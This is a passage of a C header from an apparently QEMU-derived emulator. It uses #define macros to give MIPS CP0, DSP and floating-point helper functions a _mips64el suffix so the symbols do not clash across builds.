helper_mftc0_epc_mips64el #define helper_mftc0_ebase helper_mftc0_ebase_mips64el #define helper_mtc0_ebase helper_mtc0_ebase_mips64el #define helper_mttc0_ebase helper_mttc0_ebase_mips64el #define helper_mftc0_configx helper_mftc0_configx_mips64el #define helper_mtc0_config0 helper_mtc0_config0_mips64el #define helper_mtc0_config2 helper_mtc0_config2_mips64el #define helper_mtc0_config3 helper_mtc0_config3_mips64el #define helper_mtc0_config4 helper_mtc0_config4_mips64el #define helper_mtc0_config5 helper_mtc0_config5_mips64el #define helper_mtc0_lladdr helper_mtc0_lladdr_mips64el #define helper_mtc0_maar helper_mtc0_maar_mips64el #define helper_mthc0_maar helper_mthc0_maar_mips64el #define helper_mtc0_maari helper_mtc0_maari_mips64el #define helper_mtc0_watchlo helper_mtc0_watchlo_mips64el #define helper_mtc0_watchhi helper_mtc0_watchhi_mips64el #define helper_mthc0_watchhi helper_mthc0_watchhi_mips64el #define helper_mtc0_xcontext helper_mtc0_xcontext_mips64el #define helper_mtc0_framemask helper_mtc0_framemask_mips64el #define helper_mtc0_debug helper_mtc0_debug_mips64el #define helper_mttc0_debug helper_mttc0_debug_mips64el #define helper_mtc0_performance0 helper_mtc0_performance0_mips64el #define helper_mtc0_errctl helper_mtc0_errctl_mips64el #define helper_mtc0_taglo helper_mtc0_taglo_mips64el #define helper_mtc0_datalo helper_mtc0_datalo_mips64el #define helper_mtc0_taghi helper_mtc0_taghi_mips64el #define helper_mtc0_datahi helper_mtc0_datahi_mips64el #define helper_mftgpr helper_mftgpr_mips64el #define helper_mftlo helper_mftlo_mips64el #define helper_mfthi helper_mfthi_mips64el #define helper_mftacx helper_mftacx_mips64el #define helper_mftdsp helper_mftdsp_mips64el #define helper_mttgpr helper_mttgpr_mips64el #define helper_mttlo helper_mttlo_mips64el #define helper_mtthi helper_mtthi_mips64el #define helper_mttacx helper_mttacx_mips64el #define helper_mttdsp helper_mttdsp_mips64el #define helper_dmt helper_dmt_mips64el #define helper_emt helper_emt_mips64el #define helper_dvpe helper_dvpe_mips64el #define helper_evpe helper_evpe_mips64el #define helper_dvp helper_dvp_mips64el #define helper_evp helper_evp_mips64el #define cpu_mips_get_random cpu_mips_get_random_mips64el #define cpu_mips_init cpu_mips_init_mips64el #define helper_absq_s_ph helper_absq_s_ph_mips64el #define helper_absq_s_qb helper_absq_s_qb_mips64el #define helper_absq_s_w helper_absq_s_w_mips64el #define helper_absq_s_ob helper_absq_s_ob_mips64el #define helper_absq_s_qh helper_absq_s_qh_mips64el #define helper_absq_s_pw helper_absq_s_pw_mips64el #define helper_addqh_ph helper_addqh_ph_mips64el #define helper_addqh_r_ph helper_addqh_r_ph_mips64el #define helper_addqh_r_w helper_addqh_r_w_mips64el #define helper_addqh_w helper_addqh_w_mips64el #define helper_adduh_qb helper_adduh_qb_mips64el #define helper_adduh_r_qb helper_adduh_r_qb_mips64el #define helper_subqh_ph helper_subqh_ph_mips64el #define helper_subqh_r_ph helper_subqh_r_ph_mips64el #define helper_subqh_r_w helper_subqh_r_w_mips64el #define helper_subqh_w helper_subqh_w_mips64el #define helper_addq_ph helper_addq_ph_mips64el #define helper_addq_s_ph helper_addq_s_ph_mips64el #define helper_addq_s_w helper_addq_s_w_mips64el #define helper_addu_ph helper_addu_ph_mips64el #define helper_addu_qb helper_addu_qb_mips64el #define helper_addu_s_ph helper_addu_s_ph_mips64el #define helper_addu_s_qb helper_addu_s_qb_mips64el #define helper_subq_ph helper_subq_ph_mips64el #define helper_subq_s_ph helper_subq_s_ph_mips64el #define helper_subq_s_w 
helper_subq_s_w_mips64el #define helper_subu_ph helper_subu_ph_mips64el #define helper_subu_qb helper_subu_qb_mips64el #define helper_subu_s_ph helper_subu_s_ph_mips64el #define helper_subu_s_qb helper_subu_s_qb_mips64el #define helper_adduh_ob helper_adduh_ob_mips64el #define helper_adduh_r_ob helper_adduh_r_ob_mips64el #define helper_subuh_ob helper_subuh_ob_mips64el #define helper_subuh_r_ob helper_subuh_r_ob_mips64el #define helper_addq_pw helper_addq_pw_mips64el #define helper_addq_qh helper_addq_qh_mips64el #define helper_addq_s_pw helper_addq_s_pw_mips64el #define helper_addq_s_qh helper_addq_s_qh_mips64el #define helper_addu_ob helper_addu_ob_mips64el #define helper_addu_qh helper_addu_qh_mips64el #define helper_addu_s_ob helper_addu_s_ob_mips64el #define helper_addu_s_qh helper_addu_s_qh_mips64el #define helper_subq_pw helper_subq_pw_mips64el #define helper_subq_qh helper_subq_qh_mips64el #define helper_subq_s_pw helper_subq_s_pw_mips64el #define helper_subq_s_qh helper_subq_s_qh_mips64el #define helper_subu_ob helper_subu_ob_mips64el #define helper_subu_qh helper_subu_qh_mips64el #define helper_subu_s_ob helper_subu_s_ob_mips64el #define helper_subu_s_qh helper_subu_s_qh_mips64el #define helper_subuh_qb helper_subuh_qb_mips64el #define helper_subuh_r_qb helper_subuh_r_qb_mips64el #define helper_addsc helper_addsc_mips64el #define helper_addwc helper_addwc_mips64el #define helper_modsub helper_modsub_mips64el #define helper_raddu_w_qb helper_raddu_w_qb_mips64el #define helper_raddu_l_ob helper_raddu_l_ob_mips64el #define helper_precr_qb_ph helper_precr_qb_ph_mips64el #define helper_precrq_qb_ph helper_precrq_qb_ph_mips64el #define helper_precr_sra_ph_w helper_precr_sra_ph_w_mips64el #define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips64el #define helper_precrq_ph_w helper_precrq_ph_w_mips64el #define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips64el #define helper_precr_ob_qh helper_precr_ob_qh_mips64el #define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips64el #define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips64el #define helper_precrq_ob_qh helper_precrq_ob_qh_mips64el #define helper_precrq_qh_pw helper_precrq_qh_pw_mips64el #define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips64el #define helper_precrq_pw_l helper_precrq_pw_l_mips64el #define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips64el #define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips64el #define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips64el #define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips64el #define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips64el #define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips64el #define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips64el #define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips64el #define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips64el #define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips64el #define helper_precequ_qh_obl helper_precequ_qh_obl_mips64el #define helper_precequ_qh_obr helper_precequ_qh_obr_mips64el #define helper_precequ_qh_obla helper_precequ_qh_obla_mips64el #define helper_precequ_qh_obra helper_precequ_qh_obra_mips64el #define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips64el #define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips64el #define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips64el #define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips64el #define helper_preceu_qh_obl helper_preceu_qh_obl_mips64el #define helper_preceu_qh_obr helper_preceu_qh_obr_mips64el #define 
helper_preceu_qh_obla helper_preceu_qh_obla_mips64el #define helper_preceu_qh_obra helper_preceu_qh_obra_mips64el #define helper_shll_qb helper_shll_qb_mips64el #define helper_shrl_qb helper_shrl_qb_mips64el #define helper_shra_qb helper_shra_qb_mips64el #define helper_shra_r_qb helper_shra_r_qb_mips64el #define helper_shll_ob helper_shll_ob_mips64el #define helper_shrl_ob helper_shrl_ob_mips64el #define helper_shra_ob helper_shra_ob_mips64el #define helper_shra_r_ob helper_shra_r_ob_mips64el #define helper_shll_ph helper_shll_ph_mips64el #define helper_shll_s_ph helper_shll_s_ph_mips64el #define helper_shll_qh helper_shll_qh_mips64el #define helper_shll_s_qh helper_shll_s_qh_mips64el #define helper_shrl_qh helper_shrl_qh_mips64el #define helper_shra_qh helper_shra_qh_mips64el #define helper_shra_r_qh helper_shra_r_qh_mips64el #define helper_shll_s_w helper_shll_s_w_mips64el #define helper_shra_r_w helper_shra_r_w_mips64el #define helper_shll_pw helper_shll_pw_mips64el #define helper_shll_s_pw helper_shll_s_pw_mips64el #define helper_shra_pw helper_shra_pw_mips64el #define helper_shra_r_pw helper_shra_r_pw_mips64el #define helper_shrl_ph helper_shrl_ph_mips64el #define helper_shra_ph helper_shra_ph_mips64el #define helper_shra_r_ph helper_shra_r_ph_mips64el #define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips64el #define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips64el #define helper_mulq_rs_ph helper_mulq_rs_ph_mips64el #define helper_mul_ph helper_mul_ph_mips64el #define helper_mul_s_ph helper_mul_s_ph_mips64el #define helper_mulq_s_ph helper_mulq_s_ph_mips64el #define helper_muleq_s_w_phl helper_muleq_s_w_phl_mips64el #define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips64el #define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips64el #define helper_mulsa_w_ph helper_mulsa_w_ph_mips64el #define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips64el #define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips64el #define helper_mulq_rs_qh helper_mulq_rs_qh_mips64el #define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips64el #define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips64el #define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips64el #define helper_dpau_h_qbl helper_dpau_h_qbl_mips64el #define helper_dpau_h_qbr helper_dpau_h_qbr_mips64el #define helper_dpsu_h_qbl helper_dpsu_h_qbl_mips64el #define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips64el #define helper_dpau_h_obl helper_dpau_h_obl_mips64el #define helper_dpau_h_obr helper_dpau_h_obr_mips64el #define helper_dpsu_h_obl helper_dpsu_h_obl_mips64el #define helper_dpsu_h_obr helper_dpsu_h_obr_mips64el #define helper_dpa_w_ph helper_dpa_w_ph_mips64el #define helper_dpax_w_ph helper_dpax_w_ph_mips64el #define helper_dps_w_ph helper_dps_w_ph_mips64el #define helper_dpsx_w_ph helper_dpsx_w_ph_mips64el #define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips64el #define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips64el #define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips64el #define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips64el #define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips64el #define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips64el #define helper_dpa_w_qh helper_dpa_w_qh_mips64el #define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips64el #define helper_dps_w_qh helper_dps_w_qh_mips64el #define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips64el #define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips64el #define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips64el #define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips64el #define helper_dpsq_sa_l_pw 
helper_dpsq_sa_l_pw_mips64el #define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips64el #define helper_maq_s_w_phl helper_maq_s_w_phl_mips64el #define helper_maq_s_w_phr helper_maq_s_w_phr_mips64el #define helper_maq_sa_w_phl helper_maq_sa_w_phl_mips64el #define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips64el #define helper_mulq_s_w helper_mulq_s_w_mips64el #define helper_mulq_rs_w helper_mulq_rs_w_mips64el #define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips64el #define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips64el #define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips64el #define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips64el #define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips64el #define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mips64el #define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mips64el #define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips64el #define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips64el #define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips64el #define helper_dmadd helper_dmadd_mips64el #define helper_dmaddu helper_dmaddu_mips64el #define helper_dmsub helper_dmsub_mips64el #define helper_dmsubu helper_dmsubu_mips64el #define helper_bitrev helper_bitrev_mips64el #define helper_insv helper_insv_mips64el #define helper_dinsv helper_dinsv_mips64el #define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips64el #define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips64el #define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips64el #define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips64el #define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips64el #define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips64el #define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips64el #define helper_cmpu_lt_qb helper_cmpu_lt_qb_mips64el #define helper_cmpu_le_qb helper_cmpu_le_qb_mips64el #define helper_cmp_eq_ph helper_cmp_eq_ph_mips64el #define helper_cmp_lt_ph helper_cmp_lt_ph_mips64el #define helper_cmp_le_ph helper_cmp_le_ph_mips64el #define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips64el #define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips64el #define helper_cmpu_le_ob helper_cmpu_le_ob_mips64el #define helper_cmp_eq_qh helper_cmp_eq_qh_mips64el #define helper_cmp_lt_qh helper_cmp_lt_qh_mips64el #define helper_cmp_le_qh helper_cmp_le_qh_mips64el #define helper_cmp_eq_pw helper_cmp_eq_pw_mips64el #define helper_cmp_lt_pw helper_cmp_lt_pw_mips64el #define helper_cmp_le_pw helper_cmp_le_pw_mips64el #define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips64el #define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips64el #define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips64el #define helper_pick_qb helper_pick_qb_mips64el #define helper_pick_ph helper_pick_ph_mips64el #define helper_pick_ob helper_pick_ob_mips64el #define helper_pick_qh helper_pick_qh_mips64el #define helper_pick_pw helper_pick_pw_mips64el #define helper_packrl_ph helper_packrl_ph_mips64el #define helper_packrl_pw helper_packrl_pw_mips64el #define helper_extr_w helper_extr_w_mips64el #define helper_extr_r_w helper_extr_r_w_mips64el #define helper_extr_rs_w helper_extr_rs_w_mips64el #define helper_dextr_w helper_dextr_w_mips64el #define helper_dextr_r_w helper_dextr_r_w_mips64el #define helper_dextr_rs_w helper_dextr_rs_w_mips64el #define helper_dextr_l helper_dextr_l_mips64el #define helper_dextr_r_l helper_dextr_r_l_mips64el #define helper_dextr_rs_l helper_dextr_rs_l_mips64el #define helper_extr_s_h helper_extr_s_h_mips64el #define helper_dextr_s_h helper_dextr_s_h_mips64el #define helper_extp helper_extp_mips64el #define helper_extpdp helper_extpdp_mips64el #define 
helper_dextp helper_dextp_mips64el #define helper_dextpdp helper_dextpdp_mips64el #define helper_shilo helper_shilo_mips64el #define helper_dshilo helper_dshilo_mips64el #define helper_mthlip helper_mthlip_mips64el #define helper_dmthlip helper_dmthlip_mips64el #define cpu_wrdsp cpu_wrdsp_mips64el #define helper_wrdsp helper_wrdsp_mips64el #define cpu_rddsp cpu_rddsp_mips64el #define helper_rddsp helper_rddsp_mips64el #define helper_cfc1 helper_cfc1_mips64el #define helper_ctc1 helper_ctc1_mips64el #define ieee_ex_to_mips ieee_ex_to_mips_mips64el #define helper_float_sqrt_d helper_float_sqrt_d_mips64el #define helper_float_sqrt_s helper_float_sqrt_s_mips64el #define helper_float_cvtd_s helper_float_cvtd_s_mips64el #define helper_float_cvtd_w helper_float_cvtd_w_mips64el #define helper_float_cvtd_l helper_float_cvtd_l_mips64el #define helper_float_cvt_l_d helper_float_cvt_l_d_mips64el #define helper_float_cvt_l_s helper_float_cvt_l_s_mips64el #define helper_float_cvtps_pw helper_float_cvtps_pw_mips64el #define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips64el #define helper_float_cvts_d helper_float_cvts_d_mips64el #define helper_float_cvts_w helper_float_cvts_w_mips64el #define helper_float_cvts_l helper_float_cvts_l_mips64el #define helper_float_cvts_pl helper_float_cvts_pl_mips64el #define helper_float_cvts_pu helper_float_cvts_pu_mips64el #define helper_float_cvt_w_s helper_float_cvt_w_s_mips64el #define helper_float_cvt_w_d helper_float_cvt_w_d_mips64el #define helper_float_round_l_d helper_float_round_l_d_mips64el #define helper_float_round_l_s helper_float_round_l_s_mips64el #define helper_float_round_w_d helper_float_round_w_d_mips64el #define helper_float_round_w_s helper_float_round_w_s_mips64el #define helper_float_trunc_l_d helper_float_trunc_l_d_mips64el #define helper_float_trunc_l_s helper_float_trunc_l_s_mips64el #define helper_float_trunc_w_d helper_float_trunc_w_d_mips64el #define helper_float_trunc_w_s helper_float_trunc_w_s_mips64el #define helper_float_ceil_l_d helper_float_ceil_l_d_mips64el #define helper_float_ceil_l_s helper_float_ceil_l_s_mips64el #define helper_float_ceil_w_d helper_float_ceil_w_d_mips64el #define helper_float_ceil_w_s helper_float_ceil_w_s_mips64el #define helper_float_floor_l_d helper_float_floor_l_d_mips64el #define helper_float_floor_l_s helper_float_floor_l_s_mips64el #define helper_float_floor_w_d helper_float_floor_w_d_mips64el #define helper_float_floor_w_s helper_float_floor_w_s_mips64el #define helper_float_cvt_2008_l_d helper_float_cvt_2008_l_d_mips64el #define helper_float_cvt_2008_l_s helper_float_cvt_2008_l_s_mips64el #define helper_float_cvt_2008_w_d helper_float_cvt_2008_w_d_mips64el #define helper_float_cvt_2008_w_s helper_float_cvt_2008_w_s_mips64el #define helper_float_round_2008_l_d helper_float_round_2008_l_d_mips64el #define helper_float_round_2008_l_s helper_float_round_2008_l_s_mips64el #define helper_float_round_2008_w_d helper_float_round_2008_w_d_mips64el #define helper_float_round_2008_w_s helper_float_round_2008_w_s_mips64el #define helper_float_trunc_2008_l_d helper_float_trunc_2008_l_d_mips64el #define helper_float_trunc_2008_l_s helper_float_trunc_2008_l_s_mips64el #define helper_float_trunc_2008_w_d helper_float_trunc_2008_w_d_mips64el #define helper_float_trunc_2008_w_s helper_float_trunc_2008_w_s_mips64el #define helper_float_ceil_2008_l_d helper_float_ceil_2008_l_d_mips64el #define helper_float_ceil_2008_l_s helper_float_ceil_2008_l_s_mips64el #define helper_float_ceil_2008_w_d 
helper_float_ceil_2008_w_d_mips64el #define helper_float_ceil_2008_w_s helper_float_ceil_2008_w_s_mips64el #define helper_float_floor_2008_l_d helper_float_floor_2008_l_d_mips64el #define helper_float_floor_2008_l_s helper_float_floor_2008_l_s_mips64el #define helper_float_floor_2008_w_d helper_float_floor_2008_w_d_mips64el #define helper_float_floor_2008_w_s helper_float_floor_2008_w_s_mips64el #define helper_float_abs_d helper_float_abs_d_mips64el #define helper_float_abs_s helper_float_abs_s_mips64el #define helper_float_abs_ps helper_float_abs_ps_mips64el #define helper_float_chs_d helper_float_chs_d_mips64el #define helper_float_chs_s helper_float_chs_s_mips64el #define helper_float_chs_ps helper_float_chs_ps_mips64el #define helper_float_recip_d helper_float_recip_d_mips64el #define helper_float_recip_s helper_float_recip_s_mips64el #define helper_float_rsqrt_d helper_float_rsqrt_d_mips64el #define helper_float_rsqrt_s helper_float_rsqrt_s_mips64el #define helper_float_recip1_d helper_float_recip1_d_mips64el #define helper_float_recip1_s helper_float_recip1_s_mips64el #define helper_float_recip1_ps helper_float_recip1_ps_mips64el #define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips64el #define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips64el #define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips64el #define helper_float_rint_s helper_float_rint_s_mips64el #define helper_float_rint_d helper_float_rint_d_mips64el #define float_class_s float_class_s_mips64el #define helper_float_class_s helper_float_class_s_mips64el #define float_class_d float_class_d_mips64el #define helper_float_class_d helper_float_class_d_mips64el #define helper_float_add_d helper_float_add_d_mips64el #define helper_float_add_s helper_float_add_s_mips64el #define helper_float_add_ps helper_float_add_ps_mips64el #define helper_float_sub_d helper_float_sub_d_mips64el #define helper_float_sub_s helper_float_sub_s_mips64el #define helper_float_sub_ps helper_float_sub_ps_mips64el #define helper_float_mul_d helper_float_mul_d_mips64el #define helper_float_mul_s helper_float_mul_s_mips64el #define helper_float_mul_ps helper_float_mul_ps_mips64el #define helper_float_div_d helper_float_div_d_mips64el #define helper_float_div_s helper_float_div_s_mips64el #define helper_float_div_ps helper_float_div_ps_mips64el #define helper_float_recip2_d helper_float_recip2_d_mips64el #define helper_float_recip2_s helper_float_recip2_s_mips64el #define helper_float_recip2_ps helper_float_recip2_ps_mips64el #define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips64el #define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips64el #define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips64el #define helper_float_addr_ps helper_float_addr_ps_mips64el #define helper_float_mulr_ps helper_float_mulr_ps_mips64el #define helper_float_max_s helper_float_max_s_mips64el #define helper_float_max_d helper_float_max_d_mips64el #define helper_float_maxa_s helper_float_maxa_s_mips64el #define helper_float_maxa_d helper_float_maxa_d_mips64el #define helper_float_min_s helper_float_min_s_mips64el #define helper_float_min_d helper_float_min_d_mips64el #define helper_float_mina_s helper_float_mina_s_mips64el #define helper_float_mina_d helper_float_mina_d_mips64el #define helper_float_madd_d helper_float_madd_d_mips64el #define helper_float_madd_s helper_float_madd_s_mips64el #define helper_float_madd_ps helper_float_madd_ps_mips64el #define helper_float_msub_d helper_float_msub_d_mips64el #define helper_float_msub_s helper_float_msub_s_mips64el 
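/*
 * Hedged note on this run of names: the trailing _s/_d/_ps markers are
 * the MIPS FPU format codes (single, double, paired-single), and the
 * *_2008_* variants are the IEEE 754-2008 flavors of the same
 * conversions; each helper is renamed exactly like the integer helpers
 * earlier in the header. The stringize trick below (hypothetical, not
 * part of this file) makes the rename visible:
 */
#if 0
#define STR_(x) #x
#define STR(x)  STR_(x)
/* STR(helper_float_madd_s) yields "helper_float_madd_s_mips64el" here */
#endif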
#define helper_float_msub_ps helper_float_msub_ps_mips64el #define helper_float_nmadd_d helper_float_nmadd_d_mips64el #define helper_float_nmadd_s helper_float_nmadd_s_mips64el #define helper_float_nmadd_ps helper_float_nmadd_ps_mips64el #define helper_float_nmsub_d helper_float_nmsub_d_mips64el #define helper_float_nmsub_s helper_float_nmsub_s_mips64el #define helper_float_nmsub_ps helper_float_nmsub_ps_mips64el #define helper_float_maddf_s helper_float_maddf_s_mips64el #define helper_float_maddf_d helper_float_maddf_d_mips64el #define helper_float_msubf_s helper_float_msubf_s_mips64el #define helper_float_msubf_d helper_float_msubf_d_mips64el #define helper_cmp_d_f helper_cmp_d_f_mips64el #define helper_cmpabs_d_f helper_cmpabs_d_f_mips64el #define helper_cmp_d_un helper_cmp_d_un_mips64el #define helper_cmpabs_d_un helper_cmpabs_d_un_mips64el #define helper_cmp_d_eq helper_cmp_d_eq_mips64el #define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips64el #define helper_cmp_d_ueq helper_cmp_d_ueq_mips64el #define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips64el #define helper_cmp_d_olt helper_cmp_d_olt_mips64el #define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips64el #define helper_cmp_d_ult helper_cmp_d_ult_mips64el #define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips64el #define helper_cmp_d_ole helper_cmp_d_ole_mips64el #define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips64el #define helper_cmp_d_ule helper_cmp_d_ule_mips64el #define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips64el #define helper_cmp_d_sf helper_cmp_d_sf_mips64el #define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips64el #define helper_cmp_d_ngle helper_cmp_d_ngle_mips64el #define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mips64el #define helper_cmp_d_seq helper_cmp_d_seq_mips64el #define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips64el #define helper_cmp_d_ngl helper_cmp_d_ngl_mips64el #define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips64el #define helper_cmp_d_lt helper_cmp_d_lt_mips64el #define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips64el #define helper_cmp_d_nge helper_cmp_d_nge_mips64el #define helper_cmpabs_d_nge helper_cmpabs_d_nge_mips64el #define helper_cmp_d_le helper_cmp_d_le_mips64el #define helper_cmpabs_d_le helper_cmpabs_d_le_mips64el #define helper_cmp_d_ngt helper_cmp_d_ngt_mips64el #define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips64el #define helper_cmp_s_f helper_cmp_s_f_mips64el #define helper_cmpabs_s_f helper_cmpabs_s_f_mips64el #define helper_cmp_s_un helper_cmp_s_un_mips64el #define helper_cmpabs_s_un helper_cmpabs_s_un_mips64el #define helper_cmp_s_eq helper_cmp_s_eq_mips64el #define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips64el #define helper_cmp_s_ueq helper_cmp_s_ueq_mips64el #define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips64el #define helper_cmp_s_olt helper_cmp_s_olt_mips64el #define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips64el #define helper_cmp_s_ult helper_cmp_s_ult_mips64el #define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips64el #define helper_cmp_s_ole helper_cmp_s_ole_mips64el #define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips64el #define helper_cmp_s_ule helper_cmp_s_ule_mips64el #define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips64el #define helper_cmp_s_sf helper_cmp_s_sf_mips64el #define helper_cmpabs_s_sf helper_cmpabs_s_sf_mips64el #define helper_cmp_s_ngle helper_cmp_s_ngle_mips64el #define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips64el #define helper_cmp_s_seq helper_cmp_s_seq_mips64el #define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips64el #define helper_cmp_s_ngl 
helper_cmp_s_ngl_mips64el #define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips64el #define helper_cmp_s_lt helper_cmp_s_lt_mips64el #define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips64el #define helper_cmp_s_nge helper_cmp_s_nge_mips64el #define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips64el #define helper_cmp_s_le helper_cmp_s_le_mips64el #define helper_cmpabs_s_le helper_cmpabs_s_le_mips64el #define helper_cmp_s_ngt helper_cmp_s_ngt_mips64el #define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips64el #define helper_cmp_ps_f helper_cmp_ps_f_mips64el #define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips64el #define helper_cmp_ps_un helper_cmp_ps_un_mips64el #define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips64el #define helper_cmp_ps_eq helper_cmp_ps_eq_mips64el #define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips64el #define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips64el #define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips64el #define helper_cmp_ps_olt helper_cmp_ps_olt_mips64el #define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips64el #define helper_cmp_ps_ult helper_cmp_ps_ult_mips64el #define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips64el #define helper_cmp_ps_ole helper_cmp_ps_ole_mips64el #define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips64el #define helper_cmp_ps_ule helper_cmp_ps_ule_mips64el #define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips64el #define helper_cmp_ps_sf helper_cmp_ps_sf_mips64el #define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips64el #define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips64el #define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips64el #define helper_cmp_ps_seq helper_cmp_ps_seq_mips64el #define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mips64el #define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips64el #define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mips64el #define helper_cmp_ps_lt helper_cmp_ps_lt_mips64el #define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips64el #define helper_cmp_ps_nge helper_cmp_ps_nge_mips64el #define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips64el #define helper_cmp_ps_le helper_cmp_ps_le_mips64el #define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips64el #define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips64el #define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips64el #define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips64el #define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips64el #define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips64el #define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips64el #define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips64el #define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips64el #define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips64el #define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips64el #define helper_r6_cmp_d_saf 